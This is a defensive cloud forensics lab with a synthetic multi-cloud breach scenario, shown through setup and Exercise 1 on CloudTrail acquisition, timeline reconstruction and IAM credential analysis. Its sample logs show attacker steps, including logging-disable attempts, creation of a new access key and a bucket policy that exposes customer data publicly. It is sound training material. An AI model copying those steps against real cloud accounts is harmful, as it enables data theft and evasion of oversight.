Lab 24: Cloud DFIR & Evidence Collection¶
Chapter: 20 (Cloud Attack & Defense), 27 (Digital Forensics), 28 (Advanced Incident Response) Difficulty: Expert Estimated Time: 8-10 hours Prerequisites: Chapter 20, Chapter 27, Chapter 28, Chapter 9, familiarity with AWS CLI, Azure CLI, cloud IAM concepts
Overview¶
In this lab you will:
- Perform AWS CloudTrail and CloudWatch forensic acquisition -- preserving log integrity, reconstructing attacker timelines from API calls, analyzing IAM credential reports, and documenting evidence chain of custody
- Execute AWS EC2 instance forensic acquisition -- creating EBS snapshots for evidence preservation, acquiring volatile memory using SSM Run Command with LiME/AVML, mounting disk images read-only, and analyzing VPC Flow Logs and S3 access logs for data exfiltration indicators
- Investigate Azure Activity Logs and Microsoft Sentinel -- exporting audit telemetry, hunting for compromise indicators with KQL, detecting Managed Identity and Service Principal abuse, and auditing Key Vault access patterns
- Conduct Azure VM disk forensics and network evidence collection -- snapshotting and exporting OS disks for offline analysis, analyzing NSG Flow Logs, investigating Azure Storage account access, and collecting container logs from ACI/AKS
- Coordinate cross-cloud incident response -- merging AWS and Azure timelines, executing legal hold procedures, building chain of custody documentation, writing forensic reports, preserving evidence for law enforcement, and detecting anti-forensics techniques
Synthetic Data Only
All data in this lab is 100% synthetic and fictional. All IP addresses use RFC 5737 (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) or RFC 1918 (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) reserved ranges. All domains use *.example.com. All AWS account IDs use 123456789012. All Azure subscription and tenant IDs are synthetic. All credentials are testuser/REDACTED. All resource IDs, ARNs, and object IDs are completely fictitious. This lab is for defensive education only.
Scenario¶
Incident Brief -- Quantum Financial Services
Organization: Quantum Financial Services (fictional) Industry: Financial technology -- 3,200 employees, multi-cloud infrastructure AWS Account ID: 123456789012 (SYNTHETIC) Azure Tenant ID: a1b2c3d4-e5f6-7890-abcd-ef1234567890 (SYNTHETIC) Azure Subscription ID: 12345678-abcd-ef01-2345-678901234567 (SYNTHETIC) Primary Domain: quantumfinancial.example.com (SYNTHETIC)
Cloud Infrastructure:
| Cloud | Environment | Region | Description |
|---|---|---|---|
| AWS | Production | us-east-1 | Core banking APIs, transaction processing |
| AWS | Staging | us-west-2 | Pre-production testing environment |
| Azure | Production | East US | Identity services (Entra ID), compliance workloads |
| Azure | Analytics | West US 2 | Data warehouse, ML pipelines |
AWS Network Topology:
| VPC | CIDR | Description |
|---|---|---|
| vpc-prod-0a1b2c3d | 10.100.0.0/16 | Production VPC |
| vpc-staging-4e5f6g7h | 10.200.0.0/16 | Staging VPC |
| vpc-mgmt-8i9j0k1l | 10.50.0.0/16 | Management/bastion VPC |
| Subnet | CIDR | AZ | Description |
|---|---|---|---|
| subnet-prod-web | 10.100.1.0/24 | us-east-1a | Production web tier |
| subnet-prod-app | 10.100.2.0/24 | us-east-1b | Production application tier |
| subnet-prod-db | 10.100.3.0/24 | us-east-1c | Production database tier |
| subnet-mgmt-bastion | 10.50.1.0/24 | us-east-1a | Bastion hosts |
Azure Network Topology:
| VNet | Address Space | Description |
|---|---|---|
| vnet-identity-prod | 10.150.0.0/16 | Identity and compliance workloads |
| vnet-analytics | 10.160.0.0/16 | Data analytics platform |
| Subnet | CIDR | Description |
|---|---|---|
| snet-identity | 10.150.1.0/24 | Entra ID Connect, ADFS |
| snet-compliance | 10.150.2.0/24 | Compliance scanning VMs |
| snet-analytics-compute | 10.160.1.0/24 | Spark/Databricks workers |
| snet-analytics-storage | 10.160.2.0/24 | Storage endpoints |
Key Assets:
| Resource | Identifier | Cloud | Description |
|---|---|---|---|
| API Gateway | i-0a1b2c3d4e5f6789a | AWS | Production banking API server |
| Transaction Processor | i-0b2c3d4e5f6789ab0 | AWS | Core transaction engine |
| Database Primary | i-0c3d4e5f67890abc1 | AWS | PostgreSQL primary (RDS) |
| Bastion Host | i-0d4e5f67890abcd12 | AWS | Management SSH bastion |
| S3 Data Lake | s3://qfs-datalake-prod-123456789012 | AWS | Customer data lake |
| S3 CloudTrail | s3://qfs-cloudtrail-123456789012 | AWS | CloudTrail log bucket |
| Identity Server | vm-identity-prod-01 | Azure | Entra ID Connect sync |
| Compliance Scanner | vm-compliance-01 | Azure | CIS benchmark scanner |
| Key Vault | kv-qfs-prod-eastus | Azure | Production secrets vault |
| Storage Account | stqfsanalyticswestus2 | Azure | Analytics data storage |
| AKS Cluster | aks-qfs-analytics | Azure | Kubernetes analytics workloads |
Incident Summary: On 2026-03-24 at 14:32 UTC, Quantum Financial Services' SOC received an automated alert from GuardDuty indicating unusual API calls from an IAM user account (dev-jenkins-ci) that was making DescribeInstances, GetCallerIdentity, and ListBuckets calls from an IP address (203.0.113.42 -- SYNTHETIC) not associated with any known CI/CD infrastructure. Concurrently, Azure Sentinel flagged a Managed Identity (mi-compliance-scanner) performing anomalous Key Vault secret reads at 14:38 UTC. Preliminary triage suggests a coordinated multi-cloud intrusion -- the attacker may have compromised CI/CD credentials and pivoted across cloud boundaries. The CISO has authorized a full DFIR investigation with evidence preservation for potential law enforcement referral.
Emergency Contacts:
| Role | Contact | |
|---|---|---|
| CISO | Sarah Chen | ciso@quantumfinancial.example.com |
| SOC Lead | Marcus Williams | soc-lead@quantumfinancial.example.com |
| Legal Counsel | David Park | legal@quantumfinancial.example.com |
| External Forensics | NexusIR Team | ir@nexusir.example.com |
All contacts, names, and email addresses are 100% SYNTHETIC.
Certification Relevance¶
Certification Mapping
This lab maps to objectives in the following certifications:
| Certification | Relevant Domains |
|---|---|
| GIAC GCFE (Certified Forensic Examiner) | Evidence Acquisition, Chain of Custody, Cloud Artifact Analysis |
| GIAC GCFA (Certified Forensic Analyst) | Advanced Forensic Analysis, Timeline Analysis, Cloud Forensics |
| GIAC GCFR (Cloud Forensics Responder) | Cloud Evidence Collection, AWS/Azure Forensics, Cross-Cloud IR |
| CompTIA CySA+ (CS0-003) | Domain 1: Security Operations (33%), Domain 3: Incident Response (22%) |
| CompTIA CASP+ (CAS-004) | Domain 1: Security Architecture (29%), Domain 4: Operations (22%) |
| AWS Security Specialty (SCS-C02) | Domain 3: Infrastructure Security, Domain 4: Identity & Access Management, Domain 5: Data Protection |
| Azure Security Engineer Associate (AZ-500) | Manage Security Operations, Secure Data and Applications, Manage Identity and Access |
| SC-200 (Microsoft Security Operations Analyst) | KQL Detection, Sentinel Analytics, Incident Investigation |
Prerequisites¶
Required Tools¶
| Tool | Purpose | Version |
|---|---|---|
| AWS CLI | AWS API interaction and evidence collection | 2.15+ |
| Azure CLI (az) | Azure resource management and log export | 2.58+ |
| jq | JSON parsing and log analysis | 1.7+ |
| volatility3 | Memory forensics analysis framework | 2.5+ |
| AVML | Azure/Linux volatile memory acquisition | 0.14+ |
| LiME | Linux Memory Extractor kernel module | Latest |
| sleuthkit (mmls, fls, icat) | Disk forensics and filesystem analysis | 4.12+ |
| plaso (log2timeline) | Super-timeline generation | 20240301+ |
| Python 3 | Scripting, timeline correlation, evidence processing | 3.10+ |
| PowerShell | Azure automation and analysis scripts | 7.4+ |
| dd / dcfldd | Raw disk imaging | Latest |
| sha256sum / hashdeep | Evidence integrity hashing | Latest |
| gzip / pigz | Evidence compression | Latest |
Test Accounts (Synthetic)¶
| Cloud | Account/Identity | Type | Notes |
|---|---|---|---|
| AWS | dev-jenkins-ci | IAM User | Compromised CI/CD service account |
| AWS | admin-forensics | IAM User | Forensic investigator role |
| AWS | qfs-incident-response | IAM Role | Cross-account IR role |
| Azure | mi-compliance-scanner | Managed Identity | Compromised managed identity |
| Azure | sp-devops-pipeline | Service Principal | Suspicious activity detected |
| Azure | forensic-analyst@quantumfinancial.example.com | User | Forensic investigator |
| Azure | admin@quantumfinancial.example.com | User | Global admin (break-glass) |
All accounts are 100% SYNTHETIC.
Investigator Credentials¶
# All credentials are SYNTHETIC — never use real credentials in labs
AWS Access Key ID: AKIAIOSFODNN7EXAMPLE
AWS Secret Access Key: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Azure Username: forensic-analyst@quantumfinancial.example.com
Azure Password: REDACTED
Lab Environment Setup¶
# ============================================================
# Lab 24 Environment Setup — Cloud DFIR Evidence Collection
# All resources, accounts, and data are 100% SYNTHETIC
# ============================================================
# --- AWS CLI Configuration ---
# Configure AWS CLI with forensic investigator profile (SYNTHETIC)
$ aws configure --profile forensics
AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Default region name [None]: us-east-1
Default output format [None]: json
# Verify identity
$ aws sts get-caller-identity --profile forensics
{
"UserId": "AIDAIOSFODNN7EXAMPLE",
"Account": "123456789012",
"Arn": "arn:aws:iam::123456789012:user/admin-forensics"
}
# --- Azure CLI Configuration ---
# Log in to Azure with forensic analyst account (SYNTHETIC)
$ az login --tenant a1b2c3d4-e5f6-7890-abcd-ef1234567890
# Follow browser authentication prompt (SYNTHETIC)
# Verify Azure subscription
$ az account show --query '{name:name, id:id, tenantId:tenantId}' -o json
{
"name": "QFS-Production",
"id": "12345678-abcd-ef01-2345-678901234567",
"tenantId": "a1b2c3d4-e5f6-7890-abcd-ef1234567890"
}
# --- Create forensic workspace directories ---
$ mkdir -p ~/cloud-dfir-lab24/{evidence,timeline,reports,chain-of-custody,scripts}
$ mkdir -p ~/cloud-dfir-lab24/evidence/{aws,azure}
$ mkdir -p ~/cloud-dfir-lab24/evidence/aws/{cloudtrail,flowlogs,s3-access,ebs-snapshots,memory}
$ mkdir -p ~/cloud-dfir-lab24/evidence/azure/{activity-logs,signin-logs,audit-logs,nsg-flows,disk-snapshots,keyvault-logs}
# --- Install required tools ---
$ pip install volatility3 plaso boto3 azure-identity azure-mgmt-compute azure-monitor-query
$ sudo apt-get install -y sleuthkit dcfldd hashdeep pigz
# Verify tool versions
$ aws --version
aws-cli/2.15.30 Python/3.11.8 Linux/5.15.0 source/x86_64
$ az version --query '"azure-cli"' -o tsv
2.58.0
$ vol --help 2>&1 | head -1
Volatility 3 Framework 2.5.2
$ mmls -V
The Sleuth Kit ver 4.12.1
# --- Create case metadata ---
$ cat > ~/cloud-dfir-lab24/case-metadata.json << 'CASE_EOF'
{
"case_id": "QFS-IR-2026-0042",
"case_title": "Quantum Financial Services Multi-Cloud Intrusion",
"classification": "CONFIDENTIAL",
"created_date": "2026-03-24T15:00:00Z",
"lead_investigator": "forensic-analyst@quantumfinancial.example.com",
"authorized_by": "ciso@quantumfinancial.example.com",
"incident_date": "2026-03-24T14:32:00Z",
"clouds_in_scope": ["AWS (123456789012)", "Azure (a1b2c3d4-e5f6-7890-abcd-ef1234567890)"],
"status": "Active Investigation",
"law_enforcement_referral": "Pending legal review",
"notes": "SYNTHETIC CASE — All data is fictional for training purposes"
}
CASE_EOF
echo "[+] Lab 24 environment setup complete"
echo "[+] Case ID: QFS-IR-2026-0042"
echo "[+] Working directory: ~/cloud-dfir-lab24/"
No Cloud Account? No Problem
You can complete this lab as a forensic methodology exercise using the inline sample data and command outputs. Read each scenario, study the commands and queries, and practice writing your own forensic documentation. The learning value is in understanding cloud DFIR procedures, evidence handling, and cross-cloud correlation techniques.
Exercise 1: AWS CloudTrail & CloudWatch Forensics¶
Exercise Objective
Acquire and analyze AWS CloudTrail logs to reconstruct the attacker's API call timeline. Validate log integrity, correlate IAM credential reports with suspicious activity, and establish a forensic chain of custody for all collected evidence.
MITRE ATT&CK Techniques:
- T1078.004 -- Valid Accounts: Cloud Accounts
- T1087.004 -- Account Discovery: Cloud Account
- T1580 -- Cloud Infrastructure Discovery
- T1530 -- Data from Cloud Storage
- T1562.008 -- Impair Defenses: Disable or Modify Cloud Logs
Scenario Context¶
Investigation Trigger
GuardDuty alert Recon:IAMUser/MaliciousIPCaller.Custom fired at 2026-03-24 14:32 UTC. The IAM user dev-jenkins-ci made API calls from 203.0.113.42 (SYNTHETIC) -- an IP not associated with any known Quantum Financial Services infrastructure. Normal CI/CD activity for this account originates exclusively from 10.50.1.10 (bastion host) and 10.100.2.50 (Jenkins server). The last legitimate use was 2026-03-22 at 09:15 UTC.
Initial Indicators:
| Indicator | Value | Type |
|---|---|---|
| Source IP | 203.0.113.42 | SYNTHETIC attacker IP |
| IAM User | dev-jenkins-ci | Compromised service account |
| First suspicious call | 2026-03-24T14:28:00Z | GetCallerIdentity |
| GuardDuty alert | 2026-03-24T14:32:00Z | Recon:IAMUser/MaliciousIPCaller.Custom |
| AWS Region | us-east-1 | Primary production region |
Step 1.1: CloudTrail Log Integrity Validation¶
Before analyzing CloudTrail logs, verify they have not been tampered with. CloudTrail log file integrity validation uses SHA-256 hashing and RSA digital signatures.
# ============================================================
# Step 1.1: Validate CloudTrail Log Integrity
# Ensures logs have not been modified since delivery
# ============================================================
# Check CloudTrail status — is logging enabled? (SYNTHETIC output)
$ aws cloudtrail describe-trails --profile forensics --region us-east-1
{
"trailList": [
{
"Name": "qfs-org-trail",
"S3BucketName": "qfs-cloudtrail-123456789012",
"S3KeyPrefix": "AWSLogs",
"IncludeGlobalServiceEvents": true,
"IsMultiRegionTrail": true,
"HomeRegion": "us-east-1",
"TrailARN": "arn:aws:cloudtrail:us-east-1:123456789012:trail/qfs-org-trail",
"LogFileValidationEnabled": true,
"HasCustomEventSelectors": true,
"HasInsightSelectors": true,
"IsOrganizationTrail": false
}
]
}
# Validate CloudTrail log file integrity for the incident window
# This checks digest files against delivered log files
$ aws cloudtrail validate-logs \
--trail-arn arn:aws:cloudtrail:us-east-1:123456789012:trail/qfs-org-trail \
--start-time "2026-03-22T00:00:00Z" \
--end-time "2026-03-25T00:00:00Z" \
--profile forensics \
--region us-east-1
# SYNTHETIC OUTPUT:
# Results requested for 2026-03-22T00:00:00Z to 2026-03-25T00:00:00Z
# Results found for 2026-03-22T00:00:00Z to 2026-03-25T00:00:00Z:
# 72/72 digest files valid
# 4,287/4,287 log files valid
# Check CloudTrail event selectors (what is being logged?)
$ aws cloudtrail get-event-selectors \
--trail-name qfs-org-trail \
--profile forensics \
--region us-east-1
{
"TrailARN": "arn:aws:cloudtrail:us-east-1:123456789012:trail/qfs-org-trail",
"AdvancedEventSelectors": [
{
"Name": "Management events",
"FieldSelectors": [
{
"Field": "eventCategory",
"Equals": ["Management"]
}
]
},
{
"Name": "S3 data events",
"FieldSelectors": [
{
"Field": "eventCategory",
"Equals": ["Data"]
},
{
"Field": "resources.type",
"Equals": ["AWS::S3::Object"]
}
]
}
]
}
# Check if anyone modified or stopped CloudTrail recently (anti-forensics check)
$ aws cloudtrail lookup-events \
--lookup-attributes AttributeKey=EventName,AttributeValue=StopLogging \
--start-time "2026-03-20T00:00:00Z" \
--end-time "2026-03-25T00:00:00Z" \
--profile forensics \
--region us-east-1
# SYNTHETIC OUTPUT — check for log tampering attempts:
{
"Events": [
{
"EventId": "a1b2c3d4-5678-90ab-cdef-111111111111",
"EventName": "StopLogging",
"ReadOnly": "false",
"EventTime": "2026-03-24T15:47:22Z",
"EventSource": "cloudtrail.amazonaws.com",
"Username": "dev-jenkins-ci",
"Resources": [
{
"ResourceType": "AWS::CloudTrail::Trail",
"ResourceName": "arn:aws:cloudtrail:us-east-1:123456789012:trail/qfs-org-trail"
}
],
"CloudTrailEvent": "{\"eventVersion\":\"1.09\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"AIDAIOSFODNN7EXAMPLEA\",\"arn\":\"arn:aws:iam::123456789012:user/dev-jenkins-ci\",\"accountId\":\"123456789012\",\"userName\":\"dev-jenkins-ci\"},\"eventTime\":\"2026-03-24T15:47:22Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"StopLogging\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"203.0.113.42\",\"userAgent\":\"aws-cli/2.15.0 Python/3.11.0 Linux/5.15.0\",\"requestParameters\":{\"name\":\"arn:aws:cloudtrail:us-east-1:123456789012:trail/qfs-org-trail\"},\"responseElements\":null,\"errorCode\":\"AccessDenied\",\"errorMessage\":\"User: arn:aws:iam::123456789012:user/dev-jenkins-ci is not authorized to perform: cloudtrail:StopLogging\"}"
}
]
}
# FINDING: Attacker attempted to stop CloudTrail logging at 15:47 UTC
# but was denied — the account lacks cloudtrail:StopLogging permission
# This is a key anti-forensics indicator (T1562.008)
Anti-Forensics Detection
The attacker attempted to disable CloudTrail logging using the compromised dev-jenkins-ci account at 15:47 UTC. The attempt was blocked by IAM policy restrictions. This is a critical finding — document it in the timeline and forensic report. Always check for StopLogging, DeleteTrail, UpdateTrail, and PutEventSelectors events early in any cloud investigation.
Step 1.2: CloudTrail Log Acquisition and Preservation¶
# ============================================================
# Step 1.2: Acquire CloudTrail Logs from S3
# Preserve original logs with integrity hashes
# ============================================================
# Define evidence collection window (72 hours around incident)
CASE_ID="QFS-IR-2026-0042"
EVIDENCE_DIR=~/cloud-dfir-lab24/evidence/aws/cloudtrail
START_DATE="2026-03-22"
END_DATE="2026-03-25"
# List CloudTrail log files in the S3 bucket for the incident window
$ aws s3 ls s3://qfs-cloudtrail-123456789012/AWSLogs/123456789012/CloudTrail/us-east-1/2026/03/ \
--recursive --profile forensics | head -20
# SYNTHETIC OUTPUT:
# 2026-03-22 00:05:23 45231 AWSLogs/123456789012/CloudTrail/us-east-1/2026/03/22/123456789012_CloudTrail_us-east-1_20260322T0000Z_aBcDeFgH.json.gz
# 2026-03-22 00:10:18 38472 AWSLogs/123456789012/CloudTrail/us-east-1/2026/03/22/123456789012_CloudTrail_us-east-1_20260322T0005Z_iJkLmNoP.json.gz
# ... (hundreds of log files)
# 2026-03-24 14:35:12 52841 AWSLogs/123456789012/CloudTrail/us-east-1/2026/03/24/123456789012_CloudTrail_us-east-1_20260324T1430Z_qRsTuVwX.json.gz
# 2026-03-24 14:40:08 61293 AWSLogs/123456789012/CloudTrail/us-east-1/2026/03/24/123456789012_CloudTrail_us-east-1_20260324T1435Z_yZaBcDeF.json.gz
# Download all CloudTrail logs for the evidence window
$ aws s3 sync \
s3://qfs-cloudtrail-123456789012/AWSLogs/123456789012/CloudTrail/us-east-1/2026/03/ \
${EVIDENCE_DIR}/raw/ \
--profile forensics \
--exclude "*" \
--include "*/22/*" \
--include "*/23/*" \
--include "*/24/*" \
--include "*/25/*"
# SYNTHETIC: download: s3://qfs-cloudtrail-123456789012/... -> raw/... (4,287 files, 189 MB)
# Also download digest files for integrity verification
$ aws s3 sync \
s3://qfs-cloudtrail-123456789012/AWSLogs/123456789012/CloudTrail-Digest/us-east-1/2026/03/ \
${EVIDENCE_DIR}/digests/ \
--profile forensics \
--exclude "*" \
--include "*/22/*" \
--include "*/23/*" \
--include "*/24/*" \
--include "*/25/*"
# Generate SHA-256 hashes for all acquired evidence files
$ find ${EVIDENCE_DIR}/raw/ -name "*.json.gz" -exec sha256sum {} \; \
> ${EVIDENCE_DIR}/evidence_hashes_raw.sha256
# Hash count verification
$ wc -l ${EVIDENCE_DIR}/evidence_hashes_raw.sha256
# 4287 evidence_hashes_raw.sha256
# Create a master evidence integrity record
$ cat > ${EVIDENCE_DIR}/acquisition_record.json << 'ACQ_EOF'
{
"case_id": "QFS-IR-2026-0042",
"evidence_type": "AWS CloudTrail Logs",
"source": "s3://qfs-cloudtrail-123456789012",
"region": "us-east-1",
"acquisition_start": "2026-03-24T16:00:00Z",
"acquisition_end": "2026-03-24T16:12:00Z",
"acquired_by": "forensic-analyst@quantumfinancial.example.com",
"tool": "aws s3 sync (AWS CLI 2.15.30)",
"date_range": "2026-03-22 to 2026-03-25",
"file_count": 4287,
"total_size_bytes": 198180864,
"hash_algorithm": "SHA-256",
"hash_manifest": "evidence_hashes_raw.sha256",
"log_integrity_validation": "72/72 digest files valid, 4287/4287 log files valid",
"notes": "SYNTHETIC — Training exercise data"
}
ACQ_EOF
echo "[+] CloudTrail evidence acquisition complete"
echo "[+] Files: 4,287 | Size: 189 MB | Integrity: Validated"
Step 1.3: Suspicious Activity Analysis with CloudTrail¶
# ============================================================
# Step 1.3: Analyze CloudTrail for Compromised Account Activity
# Focus on dev-jenkins-ci from attacker IP 203.0.113.42
# ============================================================
# Decompress and merge CloudTrail logs for analysis
$ zcat ${EVIDENCE_DIR}/raw/24/*.json.gz | \
jq -s '[.[].Records[]] | sort_by(.eventTime)' \
> ${EVIDENCE_DIR}/cloudtrail_20260324_merged.json
# Extract all events from the compromised account
$ cat ${EVIDENCE_DIR}/cloudtrail_20260324_merged.json | \
jq '[.[] | select(.userIdentity.userName == "dev-jenkins-ci")]' \
> ${EVIDENCE_DIR}/compromised_user_events.json
# Count events from compromised account
$ cat ${EVIDENCE_DIR}/compromised_user_events.json | jq 'length'
# 247
# Separate events by source IP to distinguish legitimate vs attacker activity
$ cat ${EVIDENCE_DIR}/compromised_user_events.json | \
jq 'group_by(.sourceIPAddress) | .[] |
{source_ip: .[0].sourceIPAddress, event_count: length,
first_event: (.[0].eventTime), last_event: (.[-1].eventTime),
api_calls: [.[] | .eventName] | unique}' \
| jq -s '.'
# SYNTHETIC OUTPUT:
[
{
"source_ip": "10.100.2.50",
"event_count": 12,
"first_event": "2026-03-24T09:15:22Z",
"last_event": "2026-03-24T09:48:33Z",
"api_calls": [
"DescribeInstances",
"GetObject",
"PutObject"
]
},
{
"source_ip": "203.0.113.42",
"event_count": 235,
"first_event": "2026-03-24T14:28:11Z",
"last_event": "2026-03-24T18:22:05Z",
"api_calls": [
"AssumeRole",
"CreateAccessKey",
"CreateKeyPair",
"DeleteTrail",
"DescribeInstances",
"DescribeSecurityGroups",
"DescribeSubnets",
"DescribeVolumes",
"DescribeVpcs",
"GetBucketAcl",
"GetBucketPolicy",
"GetCallerIdentity",
"GetObject",
"GetSecretValue",
"ListAccessKeys",
"ListAttachedUserPolicies",
"ListBuckets",
"ListGroupsForUser",
"ListRoles",
"ListSecrets",
"ListUsers",
"PutBucketPolicy",
"RunInstances",
"StopLogging"
]
}
]
# Build the attacker timeline from 203.0.113.42
$ cat ${EVIDENCE_DIR}/compromised_user_events.json | \
jq '[.[] | select(.sourceIPAddress == "203.0.113.42") |
{time: .eventTime, api: .eventName, source: .eventSource,
error: .errorCode, region: .awsRegion,
params: (.requestParameters | tostring | .[0:200])}]' \
> ${EVIDENCE_DIR}/attacker_timeline_aws.json
# Display the first 20 attacker API calls (reconnaissance phase)
$ cat ${EVIDENCE_DIR}/attacker_timeline_aws.json | \
jq '.[:20] | .[] | "\(.time) | \(.api) | \(.source) | \(.error // "SUCCESS")"' -r
# SYNTHETIC OUTPUT — Attacker Reconnaissance Timeline:
# 2026-03-24T14:28:11Z | GetCallerIdentity | sts.amazonaws.com | SUCCESS
# 2026-03-24T14:28:15Z | ListAttachedUserPolicies | iam.amazonaws.com | SUCCESS
# 2026-03-24T14:28:18Z | ListGroupsForUser | iam.amazonaws.com | SUCCESS
# 2026-03-24T14:28:22Z | ListAccessKeys | iam.amazonaws.com | SUCCESS
# 2026-03-24T14:29:01Z | ListUsers | iam.amazonaws.com | SUCCESS
# 2026-03-24T14:29:35Z | ListRoles | iam.amazonaws.com | SUCCESS
# 2026-03-24T14:30:12Z | DescribeInstances | ec2.amazonaws.com | SUCCESS
# 2026-03-24T14:30:45Z | DescribeVpcs | ec2.amazonaws.com | SUCCESS
# 2026-03-24T14:30:58Z | DescribeSubnets | ec2.amazonaws.com | SUCCESS
# 2026-03-24T14:31:22Z | DescribeSecurityGroups | ec2.amazonaws.com | SUCCESS
# 2026-03-24T14:31:55Z | DescribeVolumes | ec2.amazonaws.com | SUCCESS
# 2026-03-24T14:32:10Z | ListBuckets | s3.amazonaws.com | SUCCESS
# 2026-03-24T14:32:44Z | GetBucketAcl | s3.amazonaws.com | SUCCESS
# 2026-03-24T14:33:01Z | GetBucketPolicy | s3.amazonaws.com | SUCCESS
# 2026-03-24T14:34:22Z | ListSecrets | secretsmanager.amazonaws.com | SUCCESS
# 2026-03-24T14:34:55Z | GetSecretValue | secretsmanager.amazonaws.com | SUCCESS
# 2026-03-24T14:36:12Z | CreateAccessKey | iam.amazonaws.com | SUCCESS
# 2026-03-24T14:38:00Z | AssumeRole | sts.amazonaws.com | AccessDenied
# 2026-03-24T14:38:15Z | AssumeRole | sts.amazonaws.com | AccessDenied
# 2026-03-24T14:40:22Z | RunInstances | ec2.amazonaws.com | SUCCESS
# Extract privilege escalation attempts
$ cat ${EVIDENCE_DIR}/compromised_user_events.json | \
jq '[.[] | select(.sourceIPAddress == "203.0.113.42") |
select(.eventName == "CreateAccessKey" or
.eventName == "AssumeRole" or
.eventName == "CreateKeyPair" or
.eventName == "PutBucketPolicy" or
.eventName == "CreateUser" or
.eventName == "AttachUserPolicy") |
{time: .eventTime, api: .eventName, error: .errorCode,
details: .requestParameters}]'
# SYNTHETIC OUTPUT — Privilege Escalation Events:
[
{
"time": "2026-03-24T14:36:12Z",
"api": "CreateAccessKey",
"error": null,
"details": {
"userName": "dev-jenkins-ci"
}
},
{
"time": "2026-03-24T14:38:00Z",
"api": "AssumeRole",
"error": "AccessDenied",
"details": {
"roleArn": "arn:aws:iam::123456789012:role/AdminFullAccess",
"roleSessionName": "escalation-attempt"
}
},
{
"time": "2026-03-24T14:38:15Z",
"api": "AssumeRole",
"error": "AccessDenied",
"details": {
"roleArn": "arn:aws:iam::123456789012:role/DatabaseAdmin",
"roleSessionName": "escalation-attempt-2"
}
},
{
"time": "2026-03-24T15:02:33Z",
"api": "PutBucketPolicy",
"error": null,
"details": {
"bucketName": "qfs-datalake-prod-123456789012",
"policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Effect\":\"Allow\",\"Principal\":\"*\",\"Action\":\"s3:GetObject\",\"Resource\":\"arn:aws:s3:::qfs-datalake-prod-123456789012/*\"}]}"
}
}
]
# CRITICAL FINDING: Attacker made the data lake bucket publicly accessible
# via PutBucketPolicy at 15:02:33Z — this is a data exfiltration preparation step
Critical Finding: S3 Bucket Policy Modification
At 2026-03-24T15:02:33Z, the attacker modified the S3 bucket policy on qfs-datalake-prod-123456789012 to allow public read access (Principal: *). This is a data exfiltration preparation technique. Immediate containment action required: revert the bucket policy and block the compromised credentials.
Step 1.4: IAM Credential Report Analysis¶
# ============================================================
# Step 1.4: Generate and Analyze IAM Credential Report
# Identify all access keys, MFA status, password age
# ============================================================
# Generate IAM credential report
$ aws iam generate-credential-report --profile forensics
{
"State": "COMPLETE",
"Description": "No report exists. Starting a new report generation."
}
# Wait for report, then download
$ aws iam get-credential-report --profile forensics --output text \
--query 'Content' | base64 -d > ${EVIDENCE_DIR}/iam_credential_report.csv
# Analyze the compromised account's credential status
$ cat ${EVIDENCE_DIR}/iam_credential_report.csv | \
grep "dev-jenkins-ci"
# SYNTHETIC OUTPUT:
# dev-jenkins-ci,arn:aws:iam::123456789012:user/dev-jenkins-ci,2025-06-15T10:22:00+00:00,false,N/A,N/A,N/A,N/A,true,true,2025-06-15T10:22:00+00:00,2026-03-24T14:28:11+00:00,us-east-1,true,2025-11-01T08:30:00+00:00,2026-03-24T14:36:12+00:00,N/A,N/A
# Parse the credential report for key findings
$ python3 << 'PYEOF'
import csv
import io
from datetime import datetime
# SYNTHETIC credential report data
csv_data = """user,arn,user_creation_time,password_enabled,password_last_used,password_last_changed,password_next_rotation,mfa_active,access_key_1_active,access_key_1_last_rotated,access_key_1_last_used_date,access_key_1_last_used_region,access_key_2_active,access_key_2_last_rotated,access_key_2_last_used_date,access_key_2_last_used_region
dev-jenkins-ci,arn:aws:iam::123456789012:user/dev-jenkins-ci,2025-06-15T10:22:00+00:00,false,N/A,N/A,N/A,false,true,2025-06-15T10:22:00+00:00,2026-03-24T14:28:11+00:00,us-east-1,true,2026-03-24T14:36:12+00:00,2026-03-24T16:15:00+00:00,us-east-1
admin-forensics,arn:aws:iam::123456789012:user/admin-forensics,2025-01-10T09:00:00+00:00,true,2026-03-24T15:00:00+00:00,2026-02-15T10:00:00+00:00,2026-05-16T10:00:00+00:00,true,true,2026-02-15T10:00:00+00:00,2026-03-24T16:00:00+00:00,us-east-1,false,N/A,N/A,N/A"""
reader = csv.DictReader(io.StringIO(csv_data))
for row in reader:
if row['user'] == 'dev-jenkins-ci':
print("=" * 60)
print(f"COMPROMISED ACCOUNT ANALYSIS: {row['user']}")
print("=" * 60)
print(f" Account Created: {row['user_creation_time']}")
print(f" Password Enabled: {row['password_enabled']}")
print(f" MFA Active: {row['mfa_active']} *** NO MFA ***")
print(f" Access Key 1 Active: {row['access_key_1_active']}")
print(f" Key 1 Last Rotated: {row['access_key_1_last_rotated']}")
print(f" Key 1 Last Used: {row['access_key_1_last_used_date']}")
print(f" Access Key 2 Active: {row['access_key_2_active']}")
print(f" Key 2 Last Rotated: {row['access_key_2_last_rotated']}")
print(f" Key 2 Last Used: {row['access_key_2_last_used_date']}")
print()
print("FINDINGS:")
print(" [!] MFA is NOT enabled on this service account")
print(" [!] Access Key 1 has NOT been rotated in 9+ months")
print(" [!] Access Key 2 was created on 2026-03-24 — ATTACKER CREATED")
print(" [!] Both access keys are currently active")
print()
print("RECOMMENDATIONS:")
print(" [1] Immediately deactivate both access keys")
print(" [2] Enforce MFA on all service accounts")
print(" [3] Implement 90-day key rotation policy")
print(" [4] Investigate Access Key 2 usage")
PYEOF
Step 1.5: CloudWatch Logs Insights Queries¶
# ============================================================
# Step 1.5: CloudWatch Logs Insights — Deep-Dive Analysis
# Query application and system logs for attacker activity
# ============================================================
# Query CloudWatch for API Gateway access from attacker IP
$ aws logs start-query \
--log-group-name "/aws/apigateway/qfs-banking-api" \
--start-time $(date -d "2026-03-22" +%s) \
--end-time $(date -d "2026-03-25" +%s) \
--query-string 'fields @timestamp, @message
| filter sourceIp = "203.0.113.42"
| sort @timestamp asc
| limit 100' \
--profile forensics
